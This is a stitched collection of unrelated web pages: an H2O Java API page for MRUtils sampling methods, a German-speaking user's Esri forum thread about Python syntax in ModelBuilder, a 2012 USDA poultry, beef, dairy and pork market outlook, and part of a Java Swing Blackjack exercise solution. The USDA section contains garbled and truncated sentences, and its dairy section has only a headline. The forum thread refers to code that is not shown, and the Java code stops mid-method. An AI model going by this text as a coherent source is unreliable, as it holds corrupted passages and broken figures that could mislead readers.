public class MRUtils extends java.lang.Object clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait public MRUtils() public static Frame sampleFrame(Frame fr, long rows, long seed) fr- Input frame rows- Approximate number of rows to sample (across all chunks) seed- Seed for RNG public static Frame shuffleFramePerChunk(Frame fr, long seed) fr- Input frame public static Frame sampleFrameStratified(Frame fr, Vec label, Vec weights, float[] sampling_ratios, long maxrows, long seed, boolean allowOversampling, boolean verbose) fr- Input frame label- Label vector (must be categorical) weights- Weights vector, can be null sampling_ratios- Optional: array containing the requested sampling ratios per class (in order of domains), will be overwritten if it contains all 0s maxrows- Maximum number of rows in the returned frame seed- RNG seed for sampling allowOversampling- Allow oversampling of minority classes verbose- Whether to print verbose info public static Frame sampleFrameStratified(Frame fr, Vec label, Vec weights, float[] sampling_ratios, long seed, boolean debug) fr- Input frame label- Label vector (from the input frame) weights- Weight vector (from the input frame), can be null sampling_ratios- Given sampling ratios for each class, in order of domains seed- RNG seed debug- Whether to print debug info
http://docs.h2o.ai/h2o/latest-stable/h2o-core/javadoc/water/util/MRUtils.html
CC-MAIN-2018-34
en
refinedweb
Hi,: the expression is: I get the error message Can anyone please explain what I do wrong? Many thanks, Tegir: def CheckValueExists(gefülltesFeldBis1): import arcpy if gefülltesFeldBis1 != '': return "true" else: return "false" the expression is: CheckValueExists("%gefülltesFeldBis1%") I get the error message ERROR 000989 Python-Syntaxfehler: Parsing error SyntaxError: invalid syntax (line 1) Can anyone please explain what I do wrong? Many thanks, Tegir This seems to work. R_ changing "ü" into "ue" plus right intendation solved the problem. Great, again something learned! Now it looks like this and works without giving me error messages. Only problem is that I don't get the right result. The variable "gefülltesFeldBis1" refers to a field of type float in a table. Sometimes it is empty (no '0', just empty) so I expect the result to be 'false' but I still get 'true'. I also tried out the following options, but none of them gives me the correct result Any ideas on how to solve this problem? *maybe set the value to 'None' will pick it up? (untested) But when going through it all again I noticed that my variable 'gefuelltesFeldBis1' actually doesn't refer to a field but to the table itself. The field is called 'Bis'. So somehow I have to access that particular field first. Unfortunately it's not as easy as something like this: I have to play a bit with that new problem, still I appreciate every help :) When testing for Nulls (None) with python, don't put the quotes around the None or it is actually comparing if it is the text string "None". R_ If it is a table and you are looking for a value in a field, you will not only have to get access to the table, but to the particular row that you are testing for a value. You haven't mentioned what your workflow is, but most likely you will want to use a searchCursor for this. Somthing like that should be what you are after. R_ You have wrapped your variable in quotes, that means that everything passed to your function is converted to a string. That is fine, it just means that you only need to test strings (i.e. 'NULL' not None...), see below. You do not need to import Arcpy for pieces of Python in calculate value or field calculators. ArcGIS doesn't care so much (it will convert a returned value of 0, "false" or False to boolean False, and returned values of 1, "true" and True to boolean True), but I personally prefer to use proper True/False values rather than text, see below. You can also use a list to check a bunch of values all at once (empty string, string with just a space, 0 and NULL): There is still some strange behaviour, depending on what data type gefuelltesFeldBis1 is... Now, I am not sure about your workflow. You say you are trying to test if a field contains a value? That is not how calculate value works... I try to explain my problem better: I have a single point with 8 different water height attributes (from low water to flooding) associated. From these 8 values I want to create a remap table for the reclassification of a raster. I have a big model that includes this submodel for making the remap table. It all works fine as long as all values are there and are different to each other. But sometimes one value is missing (empty field) or 2 (neighboring) values are the same. Therefore I have to check that each time. Originally my submodel looks like this:[ATTACH=CONFIG]26141[/ATTACH] Sorry, it's in german but basically it copies the one attribute line of the point shapefile 8 times, adds to each new table 3 fields "NewClass", "From" and "To" ("Neu", "Von" und "Bis" in german). Then the correct water heights are copied into the respective fields and the unneccessary ones are deleted. In the end all 8 tables are merged together into a single table, which looks like this: [ATTACH=CONFIG]26142[/ATTACH] The last 3 columns are the important ones with the "NewClass", "From" and "To" values. Now I thought about doing an if-then logic inside of model builder but maybe this gets too complicated and I need to use a script. For example I have in class 3 no "To" value, therefore also no "From" value in class 4. Then I would like to delete the line of class 3 and reset the "NewClass" value of "4" to "34". I hope that's clearer now, for sure writing it already helped me to get it clearer in my head :) I'll let you know as soon as I found a workaround. Help is very much appreciated! Attachments
https://community.esri.com/thread/77082-syntax-problem-if-then
CC-MAIN-2018-22
en
refinedweb
USDA Livestock, Dairy and Poultry Outlook 19 September 2012 The U.S. broiler meat production estimate for third-quarter 2012 was reduced by 50 million pounds to 9.3 billion pounds, down 3 percent from the previous year. Over the last 5 weeks, an average of 162 million broiler chicks was placed weekly for grow out, about even with the previous year. Turkey meat production in July 2012 was 497 million pounds, 11- percent higher than last July, as both the number of turkeys slaughtered and their average weights were higher. USDA Livestock, Dairy, Poultry and Outlook - September 2012 Poultry Broiler Estimates Lowered for Third and Fourth Quarters The U.S. broiler meat production estimate for third-quarter 2012 was reduced by 50 million pounds to 9.3 billion pounds, down 2.5- percent from the previous year. Broiler meat production in July 2012 was 3.13 billion pounds, 3 percent higher than a year earlier. This increase in production can be attributed chiefly to the fact that July 2011 had one additional slaughter day than the previous year. The number of birds slaughtered in July was up 3 percent to 723 million, but average live-weight was down slightly to 5.76 pounds. During August and September, the number of chicks placed for growout is expected to remain at or near the level of the previous year, while higher average weights are also expected to continue. However, there are 2 fewer slaughter days in September compared with last year. The broiler meat production estimate for fourth-quarter 2012 was lowered to 9.0 billion pounds, down 150 million pounds from the previous estimate. The reduction in fourth-quarter production stems chiefly from the impact of lower expected chick placements brought about by continued high grain prices. Weekly heavy hen slaughter has been above year-earlier levels for much of August, and with pullets below last year in July, it is likely that broiler-type egg production will remain close to or below last year. For the 5-week period ending September 1, the National Agricultural Statistics Service estimated that an average of 162 million broiler chicks was placed weekly for grow out. This is almost exactly the same number of chicks placed weekly in a similar period in 2011. In 2011, between the middle of August and the middle of October, the number of chicks placed for growout was much lower than the previous year, which resulted in fourth-quarter 2011 broiler meat production being 7- percent lower than the previous year. In 2012, it is expected that the number of chicks placed for growout will be very similar to the previous year. Offsetting the stability in hatchery numbers will be one more slaughter day in the fourth quarter. Average weights in the fourth-quarter are expected to be only slightly higher than the previous year. The new production estimate for 2012 is 36.8 billion pounds, 1.2- percent lower than the previous year. The impact of much higher corn and soybean meal is expected to also heavily impact broiler production in 2013. Production in 2013 was reduced by 145 million pounds to 36.4 billion pounds down 1.1 percent from a year earlier. Stock Levels Up Slightly at the End of July After being basically unchanged between May and June, broiler products in cold storage at the end of July rose slightly to 613 million pounds, but remained down about 15-percent from the previous year. Cold storage holdings were down for most individual products, with holdings for several products down significantly. Cold storage holdings of whole birds were 42 percent lower than the previous year, breast meat was down 27-percent, and leg-quarters were down 16 percent. The only increase was a 36-percent rise in stocks of legs. Cold storage holdings of broiler products are expected to decline slightly by the end of the third-quarter to 600 million pounds. As fourth-quarter 2012 production falls from third-quarter levels, stocks are expected to gradually decline and end the year at 575 million pounds. Broiler Prices Move Higher in August Generally lower broiler production and continued strong export demand have kept broiler stocks steady for the last 3 months, with broiler prices gradually moving higher. Prices for whole birds averaged $0.83 per pound on the New York market in August, up only slightly from July but 2.5 percent higher than the previous year. Prices in August were about even with the previous year for parts such as legquarters (up less than 1 percent) and boneless/skinless thighs (down fractionally). However, wholesale prices for boneless/skinless breast meat in the Northeast market averaged $1.45 per pound in August, 12 percent above the previous year, and prices for wings continue to be very strong, averaging $1.86 per pound in August, up 92- percent from a year earlier. With broiler processors expected to lower production in response to much higher grain prices, prices for most broiler parts are expected to continue to move higher through the end of 2012 and into 2013. Turkey Production Up 11 Percent in July Turkey meat production in July was 497 million pounds, up 11 percent from July 2011. The increase in July was due chiefly to a larger number of birds slaughtered. Part of the increase was the result of one more slaughter day in July 2012 than in July 2011. Total meat production was also boosted by a slight increase in average bird weights to 29.3 pounds, up just under 1 percent from a year earlier. Over the first 7 months, 2012 turkey production has totaled 3.4 billion pounds, an increase of 4 percent from the same period in 2011. The increase in turkey production is due to a combination of a 3-percent gain in the number of birds slaughtered and a 1- percent gain in their average weight at slaughter. The production estimate for 2013 was lowered by 30 million pounds to 5.8 billion pounds, down 3.2-percent from 2012. The reduction reflects the impact that higher feed prices are expected to have on poultry production and placements in the coming months. The higher feed costs coupled with relatively weak economic conditions, are expected to cause turkey producers to lower production. Cold storage holdings for turkey totaled 555 million pounds at the end of July, up 5.7 percent from the previous year. Cold storage holdings of whole turkeys totaled 304 million pounds, 55 percent of all turkey cold storage holdings, with holdings of whole toms at 153 million (up 2 percent) and holdings of whole hens at 151 million (up 10 percent). Compared with the same period in 2011, cold storage holdings for turkey parts were mixed, with legs and mechanically deboned meat up sharply (both by over 100 percent). Holdings of turkey parts in the “other” and unclassified categories were both down (11 percent and 8 percent). Similar to the increase in whole birds, holdings of turkey breast meat rose 6 percent from a year earlier, to 74 million pounds. Turkey meat production is expected to be higher on a year-over-year basis for both the third and fourth quarters of 2012. Coupled with higher stocks thus far in the year, this is expected to cause cold storage holdings to be higher than the previous year through the end of 2012. With lower turkey meat production forecast for 2013, cold storage holdings of turkey products in 2013 are expected to drop below yearearlier levels. In August, prices for whole frozen hen turkeys averaged $1.09 per pound, up 3 percent from the previous year. Prices for whole hen turkeys on a year-over-year basis have been higher for the last 33 months. Prices for whole birds are expected to remain above year-earlier levels through the third and fourth quarters of 2012. The demand for turkey parts in relation to supply has not been as strong, in general, as for whole turkeys. In July, prices for turkey breasts averaged $1.30 per pound, 5 percent higher than the previous year. Prices for many other turkey parts in July were down significantly from the previous year. Drumsticks, at $0.58 per pound, were down 30 percent; wings were only $0.44 per pound, a decline of 46- percent from July 2011, and boneless/skinless breasts were down 23 percent to $1.74 per pound. With turkey production expected to be higher through the end of 2012, the prices for turkey parts are expected to be under some downward pressure and may not have a normal seasonal increase in the fourth quarter. Table Egg Flock Higher in July In July, the number of birds in the table egg flock was 281.1 million, up just under 1 percent from a year earlier. The table egg flock has been larger year-over-year throughout 2012. With the increase in the table egg flock, table egg production has increased. Over the first 7 months of 2012, table egg production has totaled 3.9 billion dozen, 1.1 percent higher than the previous year. Table egg production is expected to continue to be higher in third-quarter 2012 but to fall in the fourth quarter, and production is also expected to be lower in 2013. The decrease, like that for broilers and turkeys, is expected to stem from a contraction in production arising from higher feed costs. The hatching flock for meat-type birds (broiler-breeder flock) was reported at 51.1 million in July, down 6 percent from the previous year. The number of meat-type hens in the broiler-hatchery flock has been significantly lower on a year-over-year basis since mid 2011. The lower number of hens reflects the decreases in broiler chick demand as broiler integrators cut back expansion plans due to high grain prices and relatively weak domestic demand. In July and August 2012, the weekly wholesale price for eggs in the New York market had a short-lived but sharp spike in prices. Prices at the beginning of July averaged around $1.05 per dozen and then rose sharply to almost $1.60 per dozen, before falling back to around $1.16 per dozen by the beginning of September. Since the beginning of September, prices have begun to recover. With this run-up in egg prices, the third-quarter 2012 average for New York egg prices is now expected to be $1.26-$1.29 per dozen, up almost $0.12 from thirdquarter 2011. Prices in fourth-quarter 2012 are forecast at $1.32-$1.38 per dozen. This strengthening in prices in the fourth quarter is expected to come from a slow growth in production in the face of the normal increase in seasonal demand. Poultry Trade Broiler Shipments Fall in July July broiler shipments totaled 602.9 million pounds, a 7-percent reduction over broiler meat shipped in July 2011. The primary reason for the drop in shipments was weak demand in two major markets (Hong Kong and Cuba) and in at least two minor markets (Georgia and South Korea). Shipments to Hong Kong declined 78 percent, while shipments to Cuba, Georgia, and South Korea decreased 52, 67, and 44 percent, respectively. Shipments to the two largest broiler markets, Mexico and Russia, rose in July 2012: broiler meat shipped to Mexico increased 26 percent from a year earlier, and shipments to Russia increased 23 percent. However, these two increases were not enough to offset the decline in shipments to other markets. Turkey Shipments Remain Strong in July Turkey shipments in July were up 25 percent from 2011. Over 65.6 million pounds of turkey meat were shipped abroad. Turkey shipments have been up despite higher year-over-year whole hen turkey prices. The chief reason for this increase is strong foreign demand. Over half (54 percent) of the turkey meat shipped internationally went to Mexico, the largest U.S. turkey market; turkey shipments to Mexico increased 17 percent from a year earlier. There were also significant increases in turkey shipments to the Philippines, China (mainland), and Taiwan. Turkey shipments to the Philippines and Taiwan rose 776 and 492 percent, respectively, from July 2011. China imported 51 percent more turkey meat in July 2012 than it did a year ago. Egg Shipments Are Up in July July egg shipments totaled 23.6 million dozen, up 16 percent from last year. Exports in July may have been supported by relatively low prices in the preceding months. The primary reason for the increase is relatively low egg prices. In the second quarter, wholesale prices for one dozen grade A large eggs in the New York market averaged $1.07. The three largest U.S. egg markets are Hong Kong, Japan, and Canada. Among these three markets, egg shipments to Hong Kong were the largest at 4.9 million dozen, a 19-percent increase from last July. Canada had the largest increase from a year ago at 36.7 percent. Japan, imported 7.7 percent more eggs in July 2012 than a year ago. Beef/Cattle Drought Continues To Affect Cow Slaughter and Feedlot Placements For most of 2012, high feeding costs and low milk prices have driven year-overyear increases in federally inspected weekly dairy cow slaughter. Federally inspected beef cow slaughter has also increased, but more erratically and mostly in a typical seasonal pattern, since mid-April 2012. Furthermore, while beef cow slaughter has also remained generally below 2011 and 2010 levels, it has been heavy relative to the January 1, 2012 cow inventory, but the drought-induced beef cow slaughter that occurred in 2011 was heavier relative to the 2011 cow inventory. As a result, total federally inspected cow slaughter is below year-earlier slaughter for most weeks in 2012. Further, slaughter cow prices have generally declined since their May 2012 peak, but while currently below that peak, they remain above year-earlier prices on a weekly basis. While prices for feeder cattle in 2012, especially the heavier cattle, have been generally well above prices for corresponding periods in 2011, in July they declined to levels that are about even with same-month 2011 levels. This is largely due to drought-reduced pasture availability and the impact of high feed costs on cattlefeeding margins that have been negative since April 2011. At the same time, prices for lightweight feeder cattle began increasing relative to heavyweight cattle, motivated in part by the positive outlook for feeder cattle demand in 2013 and prospects for winter pasture. However, the extent of demand for feeder cattle will depend on the final outcome of this fall’s corn harvest. Demand for heifer calves have begun increasing seasonally since July lows. In addition, some current industry anecdotes suggest packers may be having difficulties finding enough finished cattle to meet their needs, which should be supportive of prices, except that packer margins will decline from the higher fed cattle prices combined with static or declining wholesale values. However, fed cattle prices could be pressured if feedlot managers are not marketing finished cattle in as timely a manner as previously thought. Evidence supporting a possible buildup includes higher dressed weights, a larger number of cattle on feed for more than 120 days, and higher dressing percentages. For instance, while dressed weights are increasing seasonally, they are well above year-earlier levels and are not likely to peak until around mid-October when they traditionally peak. Another indicator is the record number (since August 1996) of cattle on feed for 120-plus days on August-pound feeder calves placed in late 2011. A third indicator is the 5July/early August 2012 and are above year-earlier values. Despite this, improving fed cattle prices have pressured packer margins, which have deteriorated recently. Part of the reason for the improved cutout values is that demand for some middle meats and other cuts helped move monthly retail Choice beef prices higher in July. While Choice retail values improved slightly in July, the All-fresh beef price set yet another record at $4.71 per pound. However, both retail Choice and All-fresh beef prices retreated slightly in August to $4.95 and $4.70. While the demand for ground products appears to be providing ongoing price support to the All-fresh beef price of which it is a component, it does not seem to be sufficient to completely offset the negative pressure associated with the end of the summer grilling season. U.S. Beef Import Levels Remain Buoyant, While Exports Face Pressure U.S. beef imports through July were 16 percent higher than a year earlier, and growth is expected to continue into next year, with third- and fourth-quarter imports in 2012 forecast at 615 and 540 million pounds, respectively. Although imports have been strong for much of 2012, growth in beef imports from Oceania slowed entering the summer months and imports from Canada have been lower year-overyear since the second quarter. Nevertheless, total beef imports for 2012 are forecast at 2.4 billion pounds, or 17 percent higher than a year earlier. The momentum in the import market is expected to continue into next year as total imports are forecast 9 percent higher year-over-year. Momentum in the U.S. beef export market continues to be hampered largely by a relatively stronger U.S. dollar, constraining export levels through July to 12 percent below a year-ago. Excluding Vietnam and Hong Kong, export levels to the remaining top 10 export countries through July have been lower, year-over-year. Third- and fourth-quarter exports are forecast at 670 and 625 million pounds, respectively, with total 2012 export levels forecast at 2.48 billion pounds, or 11 percent below a year ago. U.S. exports in 2013 are forecast slightly lower at 2.45 billion pounds. Dairy A Lower Forecast Milk Supply in 2013 Helps Keep Prices Firm. PorkHogs Hog Producers Appear To Be Holding Onto Their Sows Despite drought-induced record-high corn and soybean meal prices, sow slaughter data suggests that hog producers are not “sprinting towards the exits.” Monthly hog slaughter depicted below indicates that sow slaughter for June—the month where drought conditions became apparent—was more than 9 percent below slaughter in June 2011, 8.7 percent below the 3-year average, and 11.3 percent below the 5-year average. For July, while sow slaughter was 5.7 percent above the July 2011 level, it was 3.2 percent below the 3-year average July sow slaughter and 8.4 percent below the 5-year July average. USDA\NASS will release August federally inspected sow slaughter data on September 21st. In the meantime, weekly sow slaughter for the weeks ending August 4th through September 1st shows slaughter to be less than 5 percent above comparable weeks a year ago. It is possible, however, that higher sow prices induced larger August slaughter numbers. After moving lower through July, sow prices in August appear to have bottomed out and to. Moderate summer sow slaughter suggests a scenario in which, despite record-high prices for corn and soybean meal, the current price environment will persist through only the 2012-2013 crop year—a belief shared by most producers. Preserving productive capital stocks (i.e., sow inventory) during difficult market conditions would leave hog producers prepared to accelerate production as an improved feed grains production outlook and a depleted animal protein supply restore prospects for positive producer returns. Fourth-quarter 2012 pork production is expected to be almost 6.3 billion pounds, 1.6 percent greater than in the same period a year ago. Estimated dressed weights in the fourth quarter will likely continue to run just slightly ahead of year-earlier weights.. Third-Quarter Exports Begin on a Positive Note July pork exports were almost 398 million pounds, 3 percent greater than a year ago. Increased July shipments to Mexico, China, Canada, and Russia more than offset lower exports to Japan, South Korea, and Hong Kong. The five largest export destinations for U.S. pork are listed in the table below. The calculated export shares indicate that Japan’s share of July exports has come down significantly compared with July 2011, while Mexico, China, Canada, and Russia all took larger shares of July exports than in July 2011. The five largest export destinations together accounted for almost 81 percent of July shipments, an increase from 76 percent registered in July 2011. DOWNLOAD REPORT:- Download this report here
http://www.thepoultrysite.com/reports/?id=924&country=US
CC-MAIN-2018-22
en
refinedweb
In JLS 8, Section 8.4.8.1 there is a statement: A concrete method in a generic superclass C can, under certain parameterizations, have the same signature as an abstract method in that class. In this case, the concrete method is inherited and the abstract method is not. The inherited method should then be considered to override its abstract peer from C. Maybe public abstract class A<T> { public abstract void m(T t); public void m(String s) {} } public class B extends A<String> { } In this case both methods in B will be void m(String).
https://codedump.io/share/Cob8j4p5o7hh/1/abstract-and-concrete-method-with-same-signature-in-generic-class
CC-MAIN-2018-22
en
refinedweb
<sstream> Defines several template classes that support iostreams operations on sequences stored in an allocated array object. Such sequences are easily converted to and from objects of template class basic_string. For a list of all members of this header, see <sstream> Members. #include <sstream> Remarks Objects of type char * can use the functionality in <strstream> for streaming. However, <strstream> is deprecated and the use of <sstream> is encouraged. See Also Reference Thread Safety in the Standard C++ Library
https://docs.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2008/kb1es779(v=vs.90)
CC-MAIN-2018-22
en
refinedweb
Retail SDK samples Important This topic applies to Dynamics 365 for Retail and Dynamics 365 for Finance and Operations. This topic describes three new samples that were released together with the Retail SDK in December 2016. Override message handler sample Scenario: Sometimes, one of Fabrikam's customers is in the customer relationship management (CRM) system but isn't imported into Microsoft Dynamics 365 for Retail. Therefore, Fabrikam wants to look up the customer from the CRM system and the point of sale (POS). Here are the business requirements: - Search for customers from the CRM system and the POS. - Merge the results, and show a unified result set in Retail Modern POS (MPOS). Here are some situations where you might use the override message handler: - You want to use a third-party inventory system for stock updates and inquiries. - You want to integrate with an external tax system for tax calculation. - You want to integrate with a third-party loyalty system. Here are the basic tasks in the sample: - Override and implement the existing customer search request, because we are changing the existing search behavior so that an external search is performed. - After the external search is completed, call the standard search request, and merge both results. Here is the code for these tasks. public sealed class CustomerSearchRequestHandler : SingleRequestHandler<CustomersSearchRequest, CustomersSearchResponse> { /// <summary> /// Executes the workflow to retrieve customer information. /// </summary> /// <param name="request">The request.</param> /// <returns>The response.</returns> protected override CustomersSearchResponse Process(CustomersSearchRequest request) { ThrowIf.Null(request, "request"); ThrowIf.Null(request.Criteria, "request.Criteria"); // Execute custom customer search logic here. CustomersSearchResponse externalResponse = this.ExternalCustomerSearch(request.Criteria.Keyword); // Execute original customer search logic. var requestHandler = new Microsoft.Dynamics.Commerce.Runtime.Workflow.CustomerSearchRequestHandler(); CustomersSearchResponse originalResponse = request.RequestContext.Runtime.Execute<CustomersSearchResponse>(request, request.RequestContext, requestHandler, skipRequestTriggers: false); return new CustomersSearchResponse(externalResponse.Customers.Union(originalResponse.Customers).AsPagedResult()); } } The full sample code is in the RetailSDK\SampleExtensions\CommerceRuntime\Extensions.CustomerSearchSample folder of the software development kit (SDK). Best practice If you're planning to completely change the behavior of an existing request or response, or if you want to use your logic in addition to the standard logic, override the standard message handler. Request handler triggers and extension properties sample Scenario: Fabrikam wants to collect customer email preferences for email marketing. Here are the business requirements: - Enable a customer’s email preferences to be collected and updated from the POS. - A customer's email preferences should become effective immediately. Here are some situations where you might use extension properties: - You want to extend entities such as the customer and sales order, but you don't want to create a new separate entity. - As new entity fields are read from or written to the database, they should be sent between the commerce runtime (CRT) and the POS, and updated in the client. - You want temporary internal flags that can be used to control the flow of custom logic. - You want to set custom receipt fields that the receipt customization will access when receipts are generated. The following steps show the CRT code changes. For MPOS and the channel database, see the full sample. Notice that the following samples differ from previous code, where changes to the standard database artifacts were required. (For example, to expose new columns as extension properties, changes to the view were required. To receive a list of extension properties and update these properties together with standard fields, changes to the stored procedure were required.) Eventually, as we move to a model that doesn't have inline changes, merge conflicts should not occur even when the database is updated. Therefore, our new recommendation is that you make separate database calls to read, write, and update entities. Read the entity. Implement the post-trigger for GetCustomerDataRequest, read the value from channel database, and add the value to the extension property. public class GetCustomerTriggers : IRequestTrigger { public IEnumerable<Type> SupportedRequestTypes { get { return new[] { typeof(GetCustomerDataRequest) }; } } public void OnExecuted(Request request, Response response) { // Check if default handler found a customer. var customer = ((SingleEntityDataServiceResponse<Customer>)response).Entity; if (customer == null) { return; } // Read from a custom view mapped to a custom table. var query = new SqlPagedQuery(QueryResultSettings.SingleRecord) { Select = new ColumnSet(new string[] { "EMAILOPTIN" }), From = "CUSTOMEREXTENSIONVIEW", Where = "ACCOUNTNUM = @accountNum AND DATAAREAID = @dataAreaId" }; query.Parameters["@accountNum"] = customer.AccountNumber; query.Parameters["@dataAreaId"] = request.RequestContext.GetChannelConfiguration().InventLocationDataAreaId; using (var databaseContext = new SqlServerDatabaseContext(request)) { // Use ExtensionEntity which will map all columns to extension properties. ExtensionsEntity extensions = databaseContext.ReadEntity<ExtensionsEntity>(query).FirstOrDefault(); var emailOptIn = extensions != null ? extensions.GetProperty("EMAILOPTIN") : null; // If the EmailOptIn is found, set it at a new extension property at the Customer. if (emailOptIn != null) { customer.SetProperty("EMAILOPTIN", emailOptIn); } } } } Write the entity. Override the handler for CreateOrUpdateCustomerDataRequest to run the original request handler and the custom stored procedure inside a transaction scope. If the database transaction isn't required, a post-trigger suffices here. protected override SingleEntityDataServiceResponse<Customer> Process(CreateOrUpdateCustomerDataRequest request) { using (var databaseContext = new SqlServerDatabaseContext(request)) using (var transactionScope = new TransactionScope()) { // Execute original functionality to save the customer. var requestHandler = new Microsoft.Dynamics.Commerce.Runtime.DataServices.SqlServer.CustomerSqlServerDataService(); var response = (SingleEntityDataServiceResponse<Customer>)requestHandler.Execute(request); // Execute additional functionality to save the customer's extension properties. if (!request.Customer.ExtensionProperties.IsNullOrEmpty()) { // The stored procedure will determine which extension properties are saved to which tables. ParameterSet parameters = new ParameterSet(); parameters["@TVP_EXTENSIONPROPERTIESTABLETYPE"] = new ExtensionPropertiesTableType(request.Customer.RecordId, request.Customer.ExtensionProperties).DataTable; databaseContext.ExecuteStoredProcedureNonQuery("UPDATECUSTOMEREXTENSIONPROPERTIES", parameters); } transactionScope.Complete(); return response; } } Before you try this sample, be sure to create the custom tables, views, and stored procedures in the channel database. Additionally, make the relevant changes to MPOS. The full sample code, together with additional comments, is in the RetailSDK\SampleExtensions\CommerceRuntime\Extensions.EmailPreferenceSample folder of the SDK. For information about how to create custom database artifacts, see the RetailSDK\Documents\SampleExtensionsInstructions\EmailPreference folder of the SDK. Best practice Because the order of triggers isn't guaranteed when the triggers are chained, and because of the internal cache mechanism, the pre-triggers should not change the request message, and the post-triggers should not change the response message. Extension properties are allowed, because no core properties are being changed. You should use pre-triggers and post-triggers to handle extension properties. You should also use pre-triggers to do validation and post-triggers to do additional actions. Custom fields and custom receipt types sample Scenario: Fabrikam wants to print a special receipt whenever products that have a warranty are sold. Sales receipts should include the warranty expiration date, the warranty ID, and other information. Here are the business requirements: - Print special receipts. - Print additional warranty information on sale receipts. The following steps show the CRT code changes: At the headquarters (HQ), create two custom receipt fields: EXPIRATIONDATE for the warranty expiration date and WARRANTYID for the warranty ID. Add these fields to the receipt format layout. To add the custom fields to the sales receipts or any receipt format, implement GetSalesTransactionCustomReceiptFieldServiceRequest, as shown in the following code. This code is called every time that the standard code doesn’t recognize the receipt field. public IEnumerable<Type> SupportedRequestTypes { get { return new[] { typeof(GetSalesTransactionCustomReceiptFieldServiceRequest) }; } } public Response Execute(Request request) { Type requestedType = request.GetType(); if (requestedType == typeof(GetSalesTransactionCustomReceiptFieldServiceRequest)) { return this.GetCustomReceiptFieldForSalesTransactionReceipts( (GetSalesTransactionCustomReceiptFieldServiceRequest)request); } throw new NotSupportedException(string.Format("Request '{0}' is not supported.", request.GetType())); } Add the logic for your sample fields. private GetCustomReceiptFieldServiceResponse GetCustomReceiptFieldForSalesTransactionReceipts( GetSalesTransactionCustomReceiptFieldServiceRequest request) { string receiptFieldName = request.CustomReceiptField; string returnValue = string.Empty; switch (receiptFieldName) { case "WARRANTYID": { // Write your logic } break; case "EXPIRATIONDATE": { // Write your logic } break; } return new GetCustomReceiptFieldServiceResponse(returnValue); } To create new receipt type, implement GetCustomReceiptsRequest. protected override GetReceiptResponse Process(GetCustomReceiptsRequest request) { Collection<Receipt> result = new Collection<Receipt>(); // 2. Now we can handle any additional receipt here. switch (request.ReceiptRetrievalCriteria.ReceiptType) { // An example of getting custom receipts. case ReceiptType.CustomReceipt1: { IEnumerable<Receipt> customReceipts = this.GetCustomReceipts(salesOrder, request.ReceiptRetrievalCriteria); result.AddRange(customReceipts); } break; default: // Add more logic to handle more types of custom receipt types. break; } return new GetReceiptResponse(new ReadOnlyCollection<Receipt>(result)); } The full sample code is in the RetailSDK\SampleExtensions\CommerceRuntime\Extensions.ReceiptsSamplefolder folder of the SDK. Note: You should call the printing of the custom receipt type from the client. For more information, see Extensibility patterns and best practices. Best practice Avoid making database calls for each custom receipt field. Instead, use extension properties that were previously set on entities. Custom receipt types can be called by any logic (per sales line, one time per some condition). See the sample for a more complete scenario.
https://docs.microsoft.com/bg-bg/dynamics365/unified-operations/retail/dev-itpro/retail-sdk/retail-sdk-samples
CC-MAIN-2018-22
en
refinedweb
Solution for Programmming Exercise 6.9 This page contains a sample solution to one of the exercises from Introduction to Programming Using Java. Exercise 6.9: Write a Blackjack program that lets the user play a game of Blackjack, with the computer as the dealer. The applet should draw the user's cards and the dealer's cards, just as was done for the graphical HighLow card game in Subsection 6.7.6. You can use the source code for that game, HighLowGUI.java, for some ideas about how to write your Blackjack game. The structures of the HighLow panel and the Blackjack panel are very similar. You will certainly want to use the drawCard() method from the HighLow program. You can find a description of the game of Blackjack in Exercise 5.5. Add the following rule to that description: If a player takes five cards without going over 21, that player wins immediately. This rule is used in some casinos. For your program, it means that you only have to allow room for five cards. You should assume that the panel is just wide enough to show five cards, and that it is tall enough show the user's hand and the dealer's hand. Note that the design of a GUI Blackjack game is very different from the design of the text-oriented program that you wrote for Exercise 5.5. The user should play the game by clicking on "Hit" and "Stand" buttons. There should be a "New Game" button that can be used to start another game after one game ends. You have to decide what happens when each of these buttons is pressed. You don't have much chance of getting this right unless you think in terms of the states that the game can be in and how the state can change. Your program will need the classes defined in Card.java, Hand.java, Deck.java, and BlackjackHand.java. Here is an applet version of the program for you to try: The constructor for this exercise can be almost identical to that in the HighLow game. The text of the buttons just has to be changed from "Higher" and "Lower" to "Hit" and "Stand". However, the nested class, CardPanel has to be rewritten to implement a game of Blackjack instead of a game of HighLow. The basic structure of the revised class remains similar to the original. All the programming for the game is in this BlackComponent()Component() method checks the state when it draws the applet. If the game is over, the card is face up. If the game is in progress, the card is face down. This is nice example of state-machine thinking. Note that writing the paintComponent() method required some calculation. The cards are 80 pixels wide and 100 pixels tall. Horizontally, there is a gap of 10 pixels between cards, and there are gaps of 10 pixels between the cards and the left and right edges. (The total width needed for the card panel, 460, allows for five 80-pixel cards and six 10-pixel gaps: 5*80 + 6*10 = 460. The applet is another 6 pixels wide because of a 3-pixel wide border on each side).Component() method. Allowing 100 pixels for the second row of cards and 30 pixels for the message at the bottom of the board, we need a height of at least 290 pixels for the canvas. I set the preferred height of the panel to 310 to for some extra space between the cards and the message at the bottom of the panel. The applet has an even greater height to allow for the height of the button bar below the card panel. In this GUI version of Blackjack, things happen when the user clicks the "Hit", "Stand", and "New Game" buttons. The program. This is similar to the way the three buttons in HighLowGUI are handled. as soon as it starts, so gameIsProgress has to be false, and the only action that the user can take at that point is to click the "New Game" button again. (Note that the doNewGame() routine is also called by the constructor of the BlackjackPanel class. This sets up the first game, when the panel still. import java.awt.*; import java.awt.event.*; import javax.swing.*; /** * In this program, the user plays a game of Blackjack. The * computer acts as the dealer. The user plays by clicking * "Hit!" and "Stand!" buttons. * * This class defines a panel, but it also contains a main() * routine that makes it possible to run the program as a * stand-alone application. In also contains a public nested * class, BlackJackGUI.Applet that can be used as an applet version * of the program. * When run as an applet the size should be about 466 pixels wide and * about 346 pixels high. That width is just big enough to show * 2 rows of 5 cards. The height is probably a little bigger * than necessary, to allow for variations in the size of buttons * from one platform to another. * * This program depends on the following classes: Card, Hand, * BlackjackHand, Deck. */ public class BlackjackGUI extends JPanel { /** * The main routine simply opens a window that shows a BlackjackGUI. */ public static void main(String[] args) { JFrame window = new JFrame("Blackjack"); BlackjackGUI content = new BlackjackGUI(); window.setContentPane(content); window.pack(); // Set size of window to preferred size of its contents. window.setResizable(false); // User can't change the window's size. Dimension screensize = Toolkit.getDefaultToolkit().getScreenSize(); window.setLocation( (screensize.width - window.getWidth())/2, (screensize.height - window.getHeight())/2 ); 